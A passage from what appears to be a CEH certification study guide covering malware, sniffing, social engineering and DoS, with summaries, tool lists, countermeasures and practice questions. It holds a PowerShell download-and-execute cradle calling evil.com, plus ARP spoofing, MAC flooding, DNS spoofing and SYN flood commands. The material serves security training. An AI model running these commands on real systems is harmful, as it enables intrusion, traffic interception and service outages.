    B) Deletes all files in the current directory
    C) Removes the attacker's user account
    D) Disables Windows Firewall
    Correct: A – Meterpreter’s clearev command wipes event logs. (B/C/D incorrect.)

Sub-Domain: Malware Threats

Topic: Malware Concepts

    The 80/20 Summary: Malware is malicious software designed to damage, disrupt, or gain unauthorized access. Types include viruses, worms, trojans, ransomware, spyware, rootkits, adware. Malware can be polymorphic to evade signature detection.

    The Logical Breakdown: Malware is delivered via phishing, drive-by downloads, infected USB. Once executed, it can replicate (virus/worm), give remote access (trojan), encrypt files (ransomware). It can modify system binaries (rootkit) to hide. Real-world: A user opens a malicious Word document with macro, which downloads Emotet trojan, which then drops a ransomware payload.

    The Technical Toolset: Analysis: IDA Pro, OllyDbg, Ghidra (disassembly). Detection: antivirus (Windows Defender, ClamAV). Sandbox: Cuckoo Sandbox, Any.Run. Malware samples: VirusTotal.

    Exam Focus Areas (High Yield): Virus requires user interaction to spread (e.g., opening file), worm self-propagates across networks. Trojan masquerades as legitimate software. Ransomware restricts access and demands payment. Countermeasure: Antivirus, email filtering, user awareness, least privilege.

    Knowledge Check: A malicious program spreads automatically by exploiting a vulnerability in SMB, without any user action. This program is classified as:
    A) Virus
    B) Worm
    C) Trojan
    D) Adware
    Correct: B – Worm propagates itself over network with no user interaction. (A needs a host file/user action; C pretends to be useful; D displays ads.)

Topic: APT Concepts

    The 80/20 Summary: Advanced Persistent Threats (APTs) are sophisticated, long-term cyberattacks by nation-states or organized groups to steal data or sabotage. They use multi-stage, custom malware and maintain long-term presence.

    The Logical Breakdown: APT actors conduct extensive reconnaissance, spear-phishing, gain initial access, move laterally, establish persistence, and exfiltrate data over months. They use zero-days and custom tools. Real-world: APT29 (Cozy Bear) compromised an organization via a phishing email with a malicious attachment, gained a foothold, and slowly moved to the domain controller to steal emails.

    The Technical Toolset: Common APT malware: Stuxnet (worm targeting ICS), Duqu, Flame. Analysis: threat intelligence platforms, Cuckoo Sandbox. Command and Control (C2) frameworks: Cobalt Strike (used by both red teams and attackers), Empire.

    Exam Focus Areas (High Yield): APTs are characterized by being targeted, long-term, and well-funded. EC-Council may ask about the difference between APT and general malware (targeting, persistence, sophistication). Countermeasure: Defense-in-depth, network segmentation, advanced threat detection (EDR, NTA), regular security audits.

    Knowledge Check: A government agency discovers that a sophisticated attacker has been exfiltrating classified documents for 18 months using custom malware that evaded standard antivirus. This is an example of:
    A) A script kiddie attack
    B) An advanced persistent threat
    C) A DDoS attack
    D) A phishing campaign
    Correct: B – APT due to long-term, targeted, custom malware. (A script kiddie uses pre-made tools; C flooding; D is a technique.)

Topic: Trojan Concepts

    The 80/20 Summary: A Trojan is a program that appears useful but performs malicious actions hidden from the user. They do not replicate themselves. They create backdoors, steal data, or download other malware.

    The Logical Breakdown: The user installs a trojan thinking it's a legitimate tool (e.g., a fake antivirus or a cracked game). Once executed, the trojan opens a port or connects outbound to the attacker, giving remote access. Real-world: A user downloads "Adobe_Flash_Update.exe" from a malicious site; it installs a RAT, giving the attacker full control and keylogging capability.

    The Technical Toolset: Trojan creation: DarkHorse, Senna Spy, Beast. Remote Access Trojans (RATs): njRAT, DarkComet, Poison Ivy. Detection: netstat to see unusual outbound connections, netstat -ano. Port numbers associated with known trojans (e.g., 12345 NetBus, 27374 SubSeven).

    Exam Focus Areas (High Yield): Trojans do not self-replicate (unlike viruses/worms). Wrappers bind the trojan with a legitimate program. Defacement trojans modify websites. Exam asks about trojan types: remote access, data-sending, destructive, proxy, FTP. Countermeasure: Don't run untrusted executables, use software from official sources, AV.

    Knowledge Check: A suspicious process on a Windows host connects to a remote IP on port 31337. This port is commonly associated with which trojan?
    A) NetBus
    B) Back Orifice
    C) SubSeven
    D) Beast
    Correct: B – Back Orifice default port is 31337. (NetBus 12345, SubSeven 27374, Beast 6666.)

Topic: Virus and Worm Concepts

    The 80/20 Summary: A virus attaches itself to a legitimate program or file and requires user action to spread. A worm is a standalone malware that spreads automatically over networks. Both can carry payloads (destructive or data theft).

    The Logical Breakdown: Virus infects executable files or macros; when user runs infected program, virus executes, replicates, and possibly delivers payload. Worm exploits network vulnerabilities (e.g., EternalBlue) to copy itself to other machines without user interaction. Real-world: The ILOVEYOU virus spread via email attachment; once opened, it sent itself to contacts. WannaCry worm propagated via SMB exploit.

    The Technical Toolset: Macro virus: VBA macros in Office. Creation tools: JPS Virus Maker, TeraBIT Virus Maker. Analysis: strings, PEiD. Detection: signature-based AV, heuristic analysis.

    Exam Focus Areas (High Yield): A logic bomb is a virus/worm that triggers on a specific condition (date, event). A multipartite virus infects both boot sector and executables. Stealth virus hides modifications. Polymorphic virus changes its code signature. Countermeasure: Updated antivirus, disable macros in Office, patch systems against worm exploits.

    Knowledge Check: A malware that infects the boot sector of a hard drive and executable files is classified as:
    A) Polymorphic virus
    B) Multipartite virus
    C) Macro virus
    D) Worm
    Correct: B – Multipartite virus infects multiple vectors (boot sector + files). (A only changes appearance; C only macros; D network worm.)

Topic: Fileless Malware Concepts

    The 80/20 Summary: Fileless malware resides entirely in memory and uses legitimate system tools (PowerShell, WMI) to execute malicious actions, avoiding writing to disk. This evades traditional file-based antivirus.

    The Logical Breakdown: Attackers leverage built-in administrative tools (Living-off-the-Land) to download a script from the internet and run it directly in memory, or use reflective DLL injection. No executable file is dropped, making forensic detection harder. Real-world: An attacker sends a phishing email with a link to a malicious PowerShell command; the command downloads and executes a script that injects shellcode into a running process, all in memory.

    The Technical Toolset: PowerShell Empire, PowerSploit, Cobalt Strike (execute-assembly). Command: powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/script.ps1')". Defense: ETW (Event Tracing for Windows), AMSI (Antimalware Scan Interface).

    Exam Focus Areas (High Yield): Fileless malware uses registry for persistence (e.g., storing script in registry keys). It exploits living-off-the-land binaries (LOLBins) like regsvr32, rundll32, mshta. Countermeasure: Enable PowerShell logging, constrained language mode, application whitelisting, and monitor for unusual process command lines.

    Knowledge Check: A security tool detects a PowerShell process making a network connection to a known malicious IP, but no new files are found on disk. What type of attack is likely occurring?
    A) Trojan
    B) Fileless malware
    C) Worm
    D) Rootkit
    Correct: B – Fileless malware lives in memory, uses PowerShell to download and run code without writing to disk. (A trojan typically drops a file; C worm spreads; D rootkit hides files/processes.)

Topic: Malware Analysis

    The 80/20 Summary: Malware analysis determines malware functionality, origin, and impact. It has two main types: static (analyzing code without execution) and dynamic (running in a sandbox). Both are essential for creating signatures and understanding threats.

    The Logical Breakdown: Static analysis: disassemble binary, examine strings, imports, PE headers. Tools: IDA Pro, Ghidra, strings, PEview. Dynamic analysis: execute in isolated VM, monitor file, registry, network changes. Real-world: Analyst receives a suspicious .exe, runs it in Cuckoo Sandbox; reports show it drops a DLL, creates a Run registry key, connects to C2 IP.

    The Technical Toolset: Static: strings malware.exe, PEiD, CFF Explorer, objdump -d malware. Dynamic: Process Monitor (procmon), Wireshark, Regshot, FakeNet (simulated network). Sandboxes: Cuckoo Sandbox, Joe Sandbox, Any.Run (online).

    Exam Focus Areas (High Yield): Static analysis can be defeated by packing/obfuscation. A packed executable has high entropy. Tools like UPX packer, PEiD can detect packers. Dynamic analysis observes behavior: API calls (CreateFile, RegSetValue). Countermeasure: Organizations should have malware analysis capability for incident response.

    Knowledge Check: An analyst uses strings on a suspicious binary but sees very few readable strings and notices the .text section has high entropy. What does this indicate?
    A) The binary is clean
    B) The binary is likely packed or encrypted
    C) The binary is a text file
    D) The binary is 64-bit
    Correct: B – Packing compresses/encrypts the code, reducing readable strings and increasing entropy. (A false; C not; D unrelated.)

Topic: Malware Countermeasures

    The 80/20 Summary: Defense against malware includes a layered approach: endpoint protection (antivirus, EDR), email filtering, web filtering, patch management, user awareness, least privilege, and application whitelisting.

    The Logical Breakdown: Deploying antivirus with up-to-date signatures and behavioral detection, blocking malicious URLs and attachments, preventing execution from Temp folders, and disabling macros by default. Regular backups mitigate ransomware. Real-world: Company uses Microsoft Defender ATP, blocks Office macros from internet, and uses Group Policy to disable PowerShell for standard users.

    The Technical Toolset: Windows Defender: MpCmdRun -Scan -ScanType 2. AppLocker: rules to allow only signed executables. Software Restriction Policies. YARA rules for custom detection. Email gateways: Mimecast, Proofpoint.

    Exam Focus Areas (High Yield): The most effective single countermeasure is user education (don't click suspicious links). EC-Council also highlights the importance of regular updates and backups. Countermeasure for fileless malware: enable AMSI, PowerShell logging. For worms: network segmentation and patching.

    Knowledge Check: Which configuration best prevents a macro virus from executing in a corporate environment?
    A) Install antivirus
    B) Disable all macros in Office documents, enable only with notification or digital signatures
    C) Block port 25
    D) Use strong passwords
    Correct: B – Disabling macros by default blocks the initial infection vector. (A can detect but may not prevent; C blocks SMTP; D unrelated.)

Topic: Anti-Malware Software

    The 80/20 Summary: Anti-malware software includes antivirus, anti-spyware, and EDR solutions that detect, block, and remove malicious software using signature-based, heuristic, and behavioral analysis.

    The Logical Breakdown: Signature-based detection compares file hashes or byte sequences to known malware databases. Heuristic analysis examines behavior and code structure for suspicious characteristics. EDR monitors endpoint activity for anomalies. Real-world: Windows Defender scans files on access; if a file matches a signature in its definitions, it quarantines the file.

    The Technical Toolset: Windows Defender: MpCmdRun -Scan -ScanType 1 (quick scan). ClamAV (Linux): clamscan -r /home. Malwarebytes, Kaspersky, McAfee. EDR: CrowdStrike Falcon, SentinelOne.

    Exam Focus Areas (High Yield): Heuristic detection can catch unknown (zero-day) malware. False positive: clean file flagged as malicious. False negative: malware not detected. EC-Council might ask about the limitation of signature-based detection (cannot detect new variants).

    Knowledge Check: A new ransomware variant not in any antivirus database encrypts files on an endpoint with EDR. The EDR detects the activity because it monitors the rate of file modifications and blocks the process. This type of detection is:
    A) Signature-based
    B) Heuristic/behavioral
    C) DNS filtering
    D) Firewall rule
    Correct: B – The EDR used behavior (mass file changes) to identify the threat. (A would need a known signature; C/D not.)

(Continuing to Domain 4 next.)## Domain 4: Network and Perimeter Hacking
Sub-Domain: Sniffing

Topic: Sniffing Concepts

    The 80/20 Summary: Sniffing captures network traffic. In a shared medium (hub) or via promiscuous mode, all frames are visible. In switched networks, traffic is isolated by MAC; attackers use ARP spoofing or MAC flooding to intercept. Sniffing targets passwords, email, and files.

    The Logical Breakdown: Network interface normally discards frames not destined to its MAC. Promiscuous mode accepts all frames. On a switch, an attacker must circumvent the switching logic by flooding the CAM table (MAC flooding) to cause the switch to fail open (act like a hub) or by spoofing ARP to direct traffic through attacker. Real-world: Attacker performs ARP poisoning between victim and gateway, enabling Wireshark to capture victim’s unencrypted HTTP traffic, revealing session cookies.

    The Technical Toolset: Wireshark (GUI): capture filter host 192.168.1.5. tcpdump: tcpdump -i eth0 host 10.0.0.1. dsniff suite: arpspoof, dnsspoof. Promiscuous mode: ip link set eth0 promisc on. Cain & Abel (Windows).

    Exam Focus Areas (High Yield): Promiscuous mode vs. monitor mode (wireless). Hub sends all traffic to all ports; switch unicasts. SPAN port allows lawful sniffing. Countermeasure: Encryption (HTTPS, SSH, VPN), static ARP, port security.

    Knowledge Check: On which type of network device can a sniffer capture all traffic simply by being plugged in, without any attack?
    A) Switch
    B) Hub
    C) Router
    D) Firewall
    Correct: B – A hub repeats all traffic to every port. (A switch separates traffic; C/D not broadcast by default.)

Topic: Sniffing Technique: MAC Attacks

    The 80/20 Summary: MAC flooding overwhelms a switch’s CAM table with fake source MAC addresses, causing it to fail open and flood all frames to all ports, converting it to a hub-like environment for sniffing.

    The Logical Breakdown: Switches learn MAC-to-port mappings and store in CAM table. If the table is full, the switch cannot learn new mappings and enters fail-open mode, broadcasting incoming frames. The attacker sends thousands of packets with random source MACs using a tool. Real-world: Attacker runs macof tool to flood the switch, then starts Wireshark to capture traffic from other hosts.

    The Technical Toolset: macof (part of dsniff): macof -i eth0 -s 192.168.1.100 (flood with randomized MACs). Yersinia: supports MAC flooding. Etherflood.

    Exam Focus Areas (High Yield): MAC flooding exploits the limited CAM table size. Countermeasure: Port security on Cisco switches: switchport port-security maximum 1 and switchport port-security violation shutdown. Also, enable MAC address learning limits.

    Knowledge Check: An attacker runs macof on a switched network and subsequently captures traffic belonging to the victim’s machine. What is the most likely explanation?
    A) The attacker performed a DHCP attack
    B) The CAM table overflowed, causing the switch to flood frames
    C) The attacker changed his MAC to the victim’s
    D) The switch is running STP
    Correct: B – MAC flooding overflows CAM table, switch enters fail-open mode broadcasting all frames. (A DHCP attack assigns IPs; C would cause disruption but not sniffing; D spanning tree not related.)

Topic: Sniffing Technique: DHCP Attacks

    The 80/20 Summary: DHCP starvation exhausts IP pool by sending many DHCP requests with fake MACs, leading to denial of service. Then a rogue DHCP server (DHCP spoofing) can provide malicious DNS or gateway settings, directing traffic to the attacker for sniffing.

    The Logical Breakdown: Attacker first starves the legitimate DHCP server using tool like Yersinia. Then brings up a rogue DHCP server that responds faster, assigning IPs with the attacker’s machine as default gateway. Victims’ traffic passes through attacker. Real-world: Attacker runs yersinia dhcp -attack 1 to starve, then sets up a rogue DHCP server offering IPs with DNS set to attacker's IP, then captures DNS queries.

    The Technical Toolset: Yersinia (DHCP attacks): yersinia -I interactive. DHCPig (DHCP exhaustion). Rogue DHCP: dnsmasq configured with malicious options. Defense: DHCP snooping on switches, which filters unauthorized DHCP responses.

    Exam Focus Areas (High Yield): DHCP snooping requires trusted ports for legitimate DHCP servers. Countermeasure: Enable DHCP snooping, rate limit DHCP requests, use static IP for critical servers.

    Knowledge Check: An organization implements DHCP snooping on its switches. After configuration, clients can no longer obtain IP addresses from the legitimate server. What is the likely issue?
    A) The legitimate DHCP server port is not configured as trusted
    B) MAC flooding is occurring
    C) DNS is down
    D) STP blocking
    Correct: A – DHCP snooping drops DHCP server messages unless port is trusted. (B would cause storm; C/D unrelated.)

Topic: Sniffing Technique: ARP Poisoning

    The 80/20 Summary: ARP poisoning (spoofing) sends falsified ARP replies to associate the attacker’s MAC with the IP of the gateway (or another host), causing traffic to be sent to the attacker, enabling sniffing or man-in-the-middle.

    The Logical Breakdown: ARP has no authentication. Attacker sends ARP reply to victim claiming attacker’s MAC for gateway IP, and to gateway claiming attacker’s MAC for victim IP. Both update their ARP cache, then traffic flows through attacker. Real-world: Using arpspoof -t victim gateway, attacker poisons both, enables IP forwarding, then captures traffic with tcpdump.

    The Technical Toolset: arpspoof: arpspoof -i eth0 -t 192.168.1.5 192.168.1.1. Bettercap: bettercap -T 192.168.1.5 --arp-spoof. Cain & Abel (ARP poisoning module). Ettercap: ettercap -T -M arp /target// /gateway//.

    Exam Focus Areas (High Yield): ARP poisoning works within the same broadcast domain. Countermeasure: Static ARP entries (not scalable), dynamic ARP inspection (DAI) on switches, ARPwatch to detect changes. DAI validates ARP packets against DHCP snooping binding table.

    Knowledge Check: A network admin sees a warning from ARPwatch that the MAC address for 192.168.1.1 changed from AA:BB:CC:11:22:33 to 00:0C:29:AB:CD:EF. What is the most likely attack?
    A) DNS poisoning
    B) ARP poisoning
    C) DHCP starvation
    D) MAC flooding
    Correct: B – ARP cache poisoning changes the MAC associated with an IP. (A changes DNS records; C exhausts DHCP; D floods table.)

Topic: Sniffing Technique: Spoofing Attacks

    The 80/20 Summary: Spoofing involves impersonating another device or user by falsifying data, such as MAC spoofing, IP spoofing, or content spoofing. Used to bypass filters, launch DoS, or perform MITM.

    The Logical Breakdown: MAC spoofing changes network card’s MAC to bypass MAC filtering. IP spoofing forges source IP to evade trace or for reflection attacks. Real-world: Attacker changes MAC to match an authorized device to connect to a wireless network with MAC filtering.

    The Technical Toolset: MAC spoofing: Linux ifconfig eth0 hw ether 00:11:22:33:44:55. Windows: SMAC tool. IP spoofing: hping3 -a spoofedIP target. Nmap spoofed decoy: -S.

    Exam Focus Areas (High Yield): IP spoofing is used in blind attacks (attacker cannot see response). Countermeasure: Ingress/egress filtering at routers (RFC 2827) to drop packets with spoofed source IPs not belonging to internal network.

    Knowledge Check: A firewall rule blocks traffic from IP 10.0.0.50. An attacker changes his machine’s IP to 10.0.0.51 and successfully connects. What type of attack is this?
    A) MAC spoofing
    B) IP spoofing
    C) ARP spoofing
    D) DNS spoofing
    Correct: B – The attacker spoofs a different IP address. (A changes MAC; C poisons ARP; D alters DNS.)

Topic: Sniffing Technique: DNS Poisoning

    The 80/20 Summary: DNS poisoning corrupts the DNS cache of a resolver or host, redirecting a domain to a malicious IP. Attackers may exploit DNS protocol weaknesses (spoofed responses) or compromise a DNS server. Used for phishing or intercepting traffic.

    The Logical Breakdown: In local network, an attacker can combine ARP spoofing and sniff for DNS requests, then spoof a DNS response with a fake IP before the real server responds. Real-world: Attacker poisons the ARP cache of the victim, then uses dnsspoof to redirect bank.com to a phishing site capturing credentials.

    The Technical Toolset: dnsspoof: dnsspoof -i eth0 -f hosts.txt (with redirections). Bettercap: dns.spoof module. Ettercap: DNS spoof plugin. Local hosts file: C:\Windows\System32\drivers\etc\hosts (manual).

    Exam Focus Areas (High Yield): DNS uses UDP 53, connectionless, easier to spoof. DNSSEC provides authentication of responses. Countermeasure: Use DNSSEC, configure DNS servers to limit recursion, use random source ports, and transaction ID randomization.

    Knowledge Check: An attacker on a local network sends a crafted DNS reply to a victim that resolves www.google.com to 192.168.1.100. Which attack technique is this?
    A) DNS cache poisoning
    B) DNS spoofing
    C) DNS amplification
    D) DNS tunneling
    Correct: B – The attacker directly spoofed a response. (A typically refers to poisoning a recursive server cache; C is DDoS; D tunnels data over DNS.)

Topic: Sniffing Tools

    The 80/20 Summary: Wireshark is the main GUI protocol analyzer. tcpdump is a CLI packet capture. Other tools: Bettercap (MITM), Cain & Abel (Windows sniffer and cracker), Ettercap, dsniff suite, and NetworkMiner (forensic).

    The Logical Breakdown: Wireshark captures packets and decodes protocols with a rich display filter. tcpdump can capture to file for later analysis. Bettercap performs ARP spoofing and HTTP/HTTPS interception. Real-world: Use tcpdump -i eth0 -w capture.pcap and later open in Wireshark to extract credentials from FTP.

    The Technical Toolset: Wireshark: filter http.request.method == "POST". tcpdump: tcpdump -i eth0 port 80 -A (ASCII). Bettercap: net.sniff on. Cain & Abel: built-in sniffer and password decoders. NetworkMiner: extracts files from pcap.

    Exam Focus Areas (High Yield): Nmap can also sniff? No. EC-Council may ask which tool is both a sniffer and password cracker: Cain & Abel. Wireshark display filters vs capture filters. Countermeasure: Use encryption to render sniffed data useless.

    Knowledge Check: A security auditor wants to capture all HTTP traffic to a file for later analysis, with minimal CPU. Which command is best?
    A) tcpdump -i eth0 port 80 -w http.pcap
    B) nmap -sS -p 80 target
    C) netstat -an
    D) ping target
    Correct: A – tcpdump captures and writes to file. (B scans; C shows connections; D tests connectivity.)

Topic: Sniffing Countermeasures

    The 80/20 Summary: Defend against sniffing by using encryption (SSL/TLS, SSH, VPN), switching infrastructure, port security, ARP spoofing detection (dynamic ARP inspection), and avoiding insecure protocols (FTP, Telnet, HTTP) for sensitive data.

    The Logical Breakdown: End-to-end encryption prevents data disclosure even if intercepted. Network segmentation limits broadcast domain. Port security and DAI mitigate MAC/ARP attacks. Real-world: Company mandates HTTPS for all internal web apps and uses IPsec VPN for remote access; deploys DAI on switches.

    The Technical Toolset: DAI: ip arp inspection vlan 10. Switchport security: switchport port-security. Detection: XArp, ArpON (ARP defense). VPN: OpenVPN, WireGuard. SSL/TLS: force HTTPS with HSTS.

    Exam Focus Areas (High Yield): Countermeasure against ARP poisoning is DAI. Against MAC flooding is port security. Against DHCP attacks is DHCP snooping. EC-Council will match attacks with specific switch features.

    Knowledge Check: Which Cisco switch feature can prevent ARP spoofing by checking ARP packets against a trusted database?
    A) Port security
    B) DHCP snooping
    C) Dynamic ARP Inspection
    D) BPDU guard
    Correct: C – DAI validates ARP packets using the DHCP snooping binding table. (A limits MAC; B secures DHCP; D prevents rogue switches.)

Topic: Sniffing Detection Techniques

    The 80/20 Summary: Detect sniffing by monitoring for promiscuous mode interfaces (differentiating response to ARP requests, DNS tests), checking for reverse DNS lookups on sniffing machines, or using tools like Nmap with scripts.

    The Logical Breakdown: A NIC in promiscuous mode may respond to ARP requests not directed to its MAC (ARP test). Some tools send crafted packets and see if response. Nmap --script=sniffer-detect checks if the target is in promiscuous mode by analyzing response times. Real-world: Admin runs nmap -sV --script=sniffer-detect 192.168.1.10 and sees "Likely in promiscuous mode".

    The Technical Toolset: Nmap: nmap --script sniffer-detect <target>. NetScanTools Pro Promiscuous Mode Scanner. Sentinel (Windows). AntiSniff.

    Exam Focus Areas (High Yield): Detection is not always reliable, as advanced sniffers can hide promiscuous mode. Running a sniffer on a switched network without ARP spoofing will capture only broadcast and traffic to that host. Countermeasure: Rely on prevention rather than detection.

    Knowledge Check: An administrator suspects a host is sniffing. She runs nmap --script=sniffer-detect 10.0.0.5 and gets "Likely in promiscuous mode". What does this indicate?
    A) The host is definitely a sniffer
    B) The host’s NIC is likely accepting all frames, not just its own
    C) The host is compromised
    D) The host is a router
    Correct: B – The script tests if the NIC is in promiscuous mode. (A not definitive; C not necessarily; D routers forward normally.)

Sub-Domain: Social Engineering

Topic: Social Engineering Concepts

    Core Concept: Social engineering exploits human psychology to trick individuals into divulging information or performing actions. Attackers manipulate trust, fear, or urgency instead of breaking technical controls.

    Key Tools: SET (Social-Engineer Toolkit): setoolkit > Social-Engineering Attacks. Phishing email templates.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: The weakest link in security is the human element. Social engineering can be human-based (impersonation, tailgating) or computer-based (phishing). EC-Council may test the phases of social engineering: research, developing trust, exploit.

    Countermeasure: Security awareness training, strict verification policies, and simulated phishing tests.

    MCQ: An attacker researches a target company's hierarchy, then calls an employee pretending to be the CEO demanding a password reset. Which phase is the attacker in when making the call?
    A) Research
    B) Exploitation
    C) Development of trust
    D) Exit
    Correct: B – The call is the exploitation phase where the actual attack occurs. (A research before; C trust built during conversation but the act of calling is exploitation.)

Topic: Social Engineering Techniques

    Core Concept: Techniques include phishing (mass email), spear phishing (targeted), whaling (executives), vishing (voice), smishing (SMS), baiting (offering something enticing), quid pro quo (service for info), tailgating, shoulder surfing, dumpster diving.

    Key Tools: Phishing: Gophish, King Phisher. Voice: spoofcard. Baiting: infected USB drops. No single command.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Distinguish between phishing types: spear phishing is personalized, whaling targets high-level execs. Baiting uses physical media (USB). Tailgating requires physical proximity.

    Countermeasure: Multi-factor authentication, anti-phishing filters, user training to recognize signs.

    MCQ: An attacker leaves USB drives labeled “Salary Report 2024” in the company parking lot. Employees find them and plug them in. This technique is:
    A) Spear phishing
    B) Baiting
    C) Vishing
    D) Pretexting
    Correct: B – Baiting uses physical media with enticing labels to exploit curiosity. (A is email; C voice; D scenario building.)

Topic: Insider Threats

    Core Concept: Insider threats come from employees, contractors, or partners with authorized access who intentionally or unintentionally cause harm. They have knowledge of internal systems, making detection harder.

    Key Tools: Data exfiltration: USB drives, cloud storage, email. No specific hacking tool; misuse of legitimate access.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Insiders can be malicious (disgruntled) or negligent (accidental data exposure). Privileged insiders pose the highest risk. EC-Council may ask about indicators: abnormal access times, copying large data.

    Countermeasure: Principle of least privilege, user behavior analytics (UBA), DLP, background checks, and separation of duties.

    MCQ: A database administrator downloads the entire customer database to a personal cloud drive right after receiving a negative performance review. This is an example of:
    A) Spear phishing
    B) Malicious insider threat
    C) Accidental data loss
    D) DDoS
    Correct: B – Authorized access used with malicious intent. (A from outside; C unintentional; D network attack.)

Topic: Impersonation on Social Networking Sites

    Core Concept: Attackers create fake profiles mimicking trusted individuals or organizations to connect with targets, gather information, or spread malware. They clone accounts and send friend requests to the victim’s contacts.

    Key Tools: Manual profile creation; tools to scrape data. Facebook account cloning. Maltego to map social networks.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Account cloning is duplicating a real profile with same name and photo, then sending requests to the victim’s friends to build trust. This is a specific social media threat.

    Countermeasure: Privacy settings to hide friend list, report fake profiles, educate users to verify requests through another channel.

    MCQ: A user receives a friend request from a profile using the name and picture of an existing friend. The new profile asks about project details. What attack is this?
    A) Whaling
    B) Social media account cloning
    C) DNS spoofing
    D) Keylogging
    Correct: B – Impersonating a known person on social media is account cloning. (A targets execs via email; C/D technical.)

Topic: Identity Theft

    Core Concept: Identity theft involves stealing personal information (SSN, bank details) to commit fraud. Attackers use phishing, dumpster diving, data breaches, and social media mining to collect PII.

    Key Tools: Data breaches databases, dark web markets. No specific CEH tool; credit monitoring services.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Identity theft can be true name (using stolen identity to open new accounts) or account takeover (gaining access to existing accounts). EC-Council focuses on methods like shoulder surfing for PINs.

    Countermeasure: Shred documents, use strong unique passwords, enable MFA, monitor credit reports.

    MCQ: A criminal uses a victim’s name, SSN, and date of birth to obtain a credit card. This type of identity theft is known as:
    A) Account takeover
    B) True name identity theft
    C) Phishing
    D) Pretexting
    Correct: B – Creating new accounts with the victim’s real name. (A is using existing accounts; C/D are techniques.)

Topic: Social Engineering Countermeasures

    Core Concept: The primary defense is security awareness training. Technical controls include email filtering, DLP, and access controls. Policies for verification, clean desk, and incident reporting.

    Key Tools: KnowBe4 (training), PhishMe (simulation). Email filters: Mimecast, Proofpoint.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: The most effective countermeasure is user education. Technology alone cannot stop all social engineering. Also, a good security policy mandates verification of identity before disclosing sensitive information.

    Countermeasure: (This is the countermeasure) Implement layered defenses: training, policies, technical filters, and physical security.

    MCQ: Which is the single most effective way to reduce the risk of a successful social engineering attack?
    A) Install antivirus
    B) Conduct regular security awareness training
    C) Deploy a firewall
    D) Use strong encryption
    Correct: B – Training users to recognize and respond to social engineering is key. (Others are technical and may not stop human manipulation.)

Sub-Domain: Denial-of-Service

Topic: DoS/DDoS Concepts

    Core Concept: Denial of Service (DoS) attacks make a resource unavailable by overwhelming it with traffic or exploiting a vulnerability. DDoS uses multiple compromised systems (botnet) to amplify impact. Targets: bandwidth, system resources, application.

    Key Tools: LOIC (low orbit ion cannon), HOIC, Slowloris. Botnets: Mirai.

    Critical Port Numbers/Protocols: N/A, but common targets HTTP 80, DNS 53, NTP 123 for amplification.

    Exam Trap: Volumetric attacks saturate bandwidth; protocol attacks consume server state (SYN flood); application layer attacks target web servers with low-and-slow requests (Slowloris). EC-Council may ask for the difference.

    Countermeasure: Rate limiting, intrusion prevention, anycast, CDN, blackhole routing, and DDoS mitigation services.

    MCQ: An attacker sends thousands of TCP SYN packets with spoofed source IPs to a web server, never completing the handshake. What type of attack is this?
    A) SYN flood
    B) HTTP flood
    C) Smurf attack
    D) Ping of Death
    Correct: A – SYN flood consumes connection table. (B is HTTP; C uses ICMP; D oversized packet.)

Topic: Botnets

    Core Concept: A botnet is a network of compromised computers (bots) controlled by a command and control (C2) server. Used for DDoS, spam, credential stuffing. Agents communicate via IRC, HTTP, or P2P.

    Key Tools: C2 frameworks: Zeus, Mirai, Cobalt Strike (adversary simulation). Detection: Wireshark to spot C2 traffic.

    Critical Port Numbers/Protocols: IRC 6667, HTTP 80/443.

    Exam Trap: Bots can be organized in client-server or peer-to-peer. P2P botnets are harder to take down. Mirai botnet targets IoT devices. EC-Council tests that bots are installed via trojans.

    Countermeasure: Keep systems patched, antivirus, firewall egress filtering, block known C2 IPs, use IDS/IPS.

    MCQ: Thousands of IP cameras with default passwords are exploited and start sending HTTP requests to a target website, causing downtime. This botnet likely resembles:
    A) Zeus
    B) Mirai
    C) WannaCry
    D) Stuxnet
    Correct: B – Mirai specifically targets IoT devices with default credentials. (A is banking trojan; C/D are worms.)

Topic: DoS/DDoS Attack Techniques

    Core Concept: Techniques include volumetric: UDP flood, ICMP flood; amplification: DNS, NTP, Memcached reflection; protocol: SYN flood, Ping of Death, Smurf; application: HTTP flood, Slowloris. Reflected attacks use spoofed source IP to bounce off servers.

    Key Tools: hping3: hping3 --flood -S -p 80 target. NTP amplification: abuse of monlist. DNS amplification: query for ANY with spoofed IP.

    Critical Port Numbers/Protocols: DNS 53, NTP 123, Memcached 11211.

    Exam Trap: Smurf attack sends ICMP echo request with spoofed victim IP to broadcast address; all hosts reply flooding victim. Fraggle uses UDP. Ping of Death sends malformed oversized ICMP packet. EC-Council wants you to know that amplification factor is high for NTP (up to 556x).

    Countermeasure: Disable unnecessary UDP services, implement ingress filtering (BCP38), rate limiting, anti-spoofing.

    MCQ: An attacker sends ICMP echo requests to the network broadcast address of 10.0.0.0/24, spoofing the source IP of the victim. All hosts reply to the victim. This is a:
    A) SYN flood
    B) Smurf attack
    C) Fraggle attack
    D) DNS amplification
    Correct: B – Smurf uses ICMP broadcast. (C uses UDP; A TCP; D DNS.)

Topic: DDoS Case Study

    Core Concept: Famous DDoS attacks: 2016 Dyn DNS attack (Mirai botnet), 2018 GitHub memcached amplification (1.35 Tbps). Attackers exploited misconfigured Memcached servers with UDP amplification.

    Key Tools: Mirai source code. Memcached: using stats command. DNS reflection.

    Critical Port Numbers/Protocols: Memcached 11211 UDP.

    Exam Trap: The GitHub attack used memcached servers with spoofed requests, achieving massive amplification. EC-Council may ask which service was abused.

    Countermeasure: Secure Memcached instances, bind to localhost, firewall UDP, and implement rate limiting.

    MCQ: In 2018, a DDoS attack peaked at 1.35 Tbps by exploiting publicly accessible Memcached servers. What made the amplification factor so high?
    A) TCP three-way handshake
    B) Small request generated a huge response (up to 51,200x)
    C) ARP spoofing
    D) DNS zone transfer
    Correct: B – Memcached amplification factor is enormous because a small UDP query returns large data. (A not amplification; C/D unrelated.)

Topic: DoS/DDoS Attack Countermeasures

    Core Concept: Defend with traffic monitoring, rate limiting, redundancy, load balancers, DDoS scrubbing services, and proper firewall rules. Block spoofed IPs at edge. Use SYN cookies to mitigate SYN flood.

    Key Tools: Cloudflare, Akamai (DDoS protection). iptables: iptables -A INPUT -p tcp --syn -m limit --limit 1/s -j ACCEPT. Snort DDoS rules.

    Critical Port Numbers/Protocols: N/A

